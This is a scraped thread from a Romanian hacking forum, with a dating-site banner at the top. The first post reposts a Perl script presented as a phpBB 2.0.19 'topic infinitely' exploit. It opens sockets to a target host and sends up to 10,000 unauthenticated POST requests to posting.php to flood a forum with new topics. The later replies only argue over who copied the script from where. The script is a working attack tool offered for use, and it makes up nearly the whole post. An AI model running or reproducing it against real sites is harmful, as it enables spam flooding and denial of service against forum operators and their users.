Simpatie.ro - matrimoniale
Bine ati venit pe HackTeam Forum !
Aici veti gasi o gama larga de metode de hack atat pe Windows cat si pe platforme Linux/Unix , programe in consecinta ,tutoriale . In acelasi timp aici veti gasi si asistenta help in materie corespunzatoare . Precizam ca tot ce se gaseste pe acest site este doar in scop de dezvoltare iar voi va asumati intreaga raspundere pt actiunile pe care le savarsiti . || SS-TEAM || Va Multumeste pt vizita !
Nu sunteti logat.
Lista Forumurilor Pe Tematici
Nou pe simpatie:
geogeorgiana17 pe Simpatie
Femeie
25 ani
Arad
cauta Barbat
26 - 57 ani
Bine ati venit pe HackTeam Forum !ReguliInregistrareLoginPoze
Bine ati venit pe HackTeam Forum ! / Windows - Hacking ! / phpBB 2.0.19 Topic infinitely exploit  
Autor
Mesaj Pagini: 1
#1
gabia35
Membru
Postari: 58
#!/usr/bin/perl

print q{
_________________________________________________________________________
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>|

           /     
            ,,  /  /
         '-.`()/`.-'
        .--_'(  )'_--.
       / /` /`""` `            * SpiderZ ForumZ Security *
        |  |  ><  |  |
                /  /
            '.__.'       


=> Exploit phpBB 2.0.19 ( by SpiderZ )
=> Topic infinitely exploit
=> Sito: www.spiderz.tk

_________________________________________________________________________
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>|

};

use IO::Socket;


$x = 0;

print q(
Exploit phpBB 2.0.19 ( by SpiderZ )

);
print q(
=> You write the URL of the situated one without to add http & www
=> Url: );
$host = <STDIN>;
chop ($host);

print q(
=> Now it indicates in which folder and place the phpbb
=>  /phpBB2/ o /forum/
=> Folder: );
$pth = <STDIN>;
chop ($pth);

print q(
=> it uses a proxy before carrying out the attack
=> In order to start the exploit you write  " hacking "
=> );
$type = <STDIN>;
chop ($type);


if($type == 1){


while($x != 0000)
{


$x++;
}


}
elsif ($type == hacking){


while($x != 10000)
{

$postit = "post=Hacking$x+&username=Exploit&subject=Exploit_phpbb_2.0.19&message=Topic infinitely exploit phpBB 2.0.19";


$lrg = length $postit;


my $sock = new IO::Socket::INET (
                                 PeerAddr => "$host",
                                 PeerPort => "80",
                                 Proto => "tcp",
                                );
die "nConnessione non riuscita: $!n" unless $sock;


print $sock "POST $pth"."posting.php?mode=newtopic&f=1 HTTP/1.1n";
print $sock "Host: $hostn";
print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5n";
print $sock "Referer: $hostn";
print $sock "Accept-Language: en-usn";
print $sock "Content-Type: application/x-www-form-urlencodedn";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4n";
print $sock "Content-Length: $lrgnn";
print $sock "$postitn";
close($sock);


syswrite STDOUT, ".";


$x++;
}
}else{


   die "
Error ! riprova...
n";
}

# www.spiderz.tk [2006]


_______________________________________


 
   
#2
monk
newbie
Postari: 6
Gabia35 macar de puneai si tu de unde l-ai copiat (www.h4cky0u.org)

 
   
#3
Sad-Dreamer
Vizitator



sa mori tu ca l-a copiat de acolo? btw atunci si aia ar trebui sa puna ca l-au copiat de pe milw0rm sau de pe spyderz.tk data viitoare vezi unde postezi ma

 
   
#4
gabia35
Membru
Postari: 58
scrie de unde lam luat  www.spiderz.tk
unde trb sa postez


_______________________________________


 
   
Pagini: 1  
Mergi la